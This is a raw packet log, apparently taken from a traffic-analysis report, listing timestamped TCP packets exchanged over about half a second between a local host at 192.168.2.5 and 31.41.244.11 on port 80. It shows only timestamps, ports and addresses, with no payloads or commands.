Dec 17, 2024 06:03:32.500484943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512135983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512223959 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512252092 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512309074 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512332916 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512346029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512346029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512346029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512356997 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512376070 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512398958 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512420893 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512530088 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512630939 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512650013 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512666941 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512686014 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512703896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512721062 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512738943 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512747049 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512747049 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512747049 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512757063 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512775898 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.512778044 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512909889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512909889 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.512999058 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.513017893 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.513036966 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.513055086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.513072968 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.513103962 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.513103962 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.513103962 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.513247967 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.513360023 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.513447046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.513550043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.513556957 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.513731956 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.514550924 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.514594078 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.514650106 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.514812946 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.515693903 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.515755892 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.515799046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.515877008 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.516765118 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.516902924 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.516958952 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.517098904 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.517924070 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.517997980 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.518013954 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.518147945 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.518953085 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.519073963 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.519160986 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.519160986 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.520056009 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.520178080 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.520248890 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.520248890 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.521192074 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.521289110 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.521306992 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.521385908 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.522245884 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.522360086 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.522372961 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.522449970 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.523353100 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.523438931 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.523462057 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.523487091 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.524425030 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.524530888 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.524557114 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.524591923 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.525558949 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.525604010 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.525903940 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.526644945 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.526765108 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.526767969 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.526832104 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.527755976 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.527878046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.527996063 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.527996063 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.528837919 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.528965950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.528999090 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.528999090 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.529937983 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.530009031 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.530036926 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.530080080 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.531042099 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.531086922 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.531153917 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.531250954 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.532128096 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.532180071 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.532229900 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.532299995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.533216000 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.533327103 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.533453941 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.533453941 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.534348965 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.534472942 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.534473896 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.534516096 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.535403013 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.535526037 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.535528898 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.535701990 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.536644936 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.536731005 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.536783934 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.536880970 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.537601948 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.537662029 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.537724018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.537815094 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.538777113 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.538867950 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.538875103 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.539043903 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.539789915 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.539906025 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.539931059 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.539978981 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.540880919 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.540967941 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.541007042 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.541429996 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.541977882 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.542052031 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.542093992 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.542093992 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.543114901 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.543263912 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.543344975 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.543344975 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.544198036 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.544291973 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.544404030 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.544404030 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.545267105 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.545392036 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.680263042 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.680300951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.680444956 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.680629969 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.680767059 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.680788994 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.680809975 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.681741953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.681869030 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.681895018 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.681919098 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.682836056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.682954073 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.682952881 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.683008909 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.683936119 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.684046984 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.684108019 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.685036898 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.685172081 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.685214043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.685475111 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.686120987 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.686212063 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.686239958 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.686371088 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.687213898 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.687336922 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.687421083 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.687963963 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.688323975 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.688384056 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.688431978 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.688519001 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.689429045 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.689483881 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.689546108 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.690103054 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.690521002 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.690620899 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.690658092 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.690726995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.691669941 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.691782951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.691823006 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.691823006 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.692728043 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.692809105 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.692847013 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.693283081 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.693830013 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.693895102 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.693944931 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.694345951 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.694915056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.695055008 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.695106983 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.696069002 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.696186066 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.696397066 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.697137117 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.697243929 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.697252035 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.697654009 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.698237896 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.698345900 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.698400974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.698400974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.699323893 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.699387074 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.699461937 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.699578047 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.700427055 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.700555086 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.700659037 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.701513052 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.701622963 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.701651096 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.701738119 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.702599049 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.702668905 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.702719927 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.702816010 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.703686953 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.703736067 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.703874111 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.703972101 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.704822063 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.704950094 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.705061913 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.705899954 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.706012964 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.706037998 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.706254959 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.706986904 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.707071066 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.707119942 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.707217932 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.708090067 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.708211899 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.708297014 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.709193945 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.709249973 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.709320068 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.709403038 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.710319996 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.710382938 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.710407972 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.710475922 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.711375952 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.711436987 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.711699009 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.711812019 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.712481022 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.712589025 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.712620974 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.712646961 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.713587046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.713654041 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.713696003 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.713748932 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.714668989 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.714771032 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.714785099 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.715186119 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.833384991 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.833426952 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.833488941 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.833549976 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.834378958 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.834398985 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.834511995 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.953248978 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.953288078 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.953423977 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.954097986 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.954118013 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:32.954159021 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:32.954209089 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073191881 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073262930 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073302984 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073316097 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073353052 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073384047 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073398113 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073445082 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073447943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073447943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073447943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073447943 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073460102 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073474884 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073489904 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073503971 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073518038 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073529959 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073544979 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073559046 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073561907 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073561907 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073563099 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073574066 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073625088 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073640108 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073653936 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073662043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073662043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073662043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073662043 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073672056 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073685884 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073699951 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073714018 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073728085 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073740959 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073754072 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073757887 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073757887 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073757887 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073757887 CET	49882	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:33.073769093 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073782921 CET	80	49882	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:33.073796988 CET	80	49882	31.41.244.11	192.168.2.5
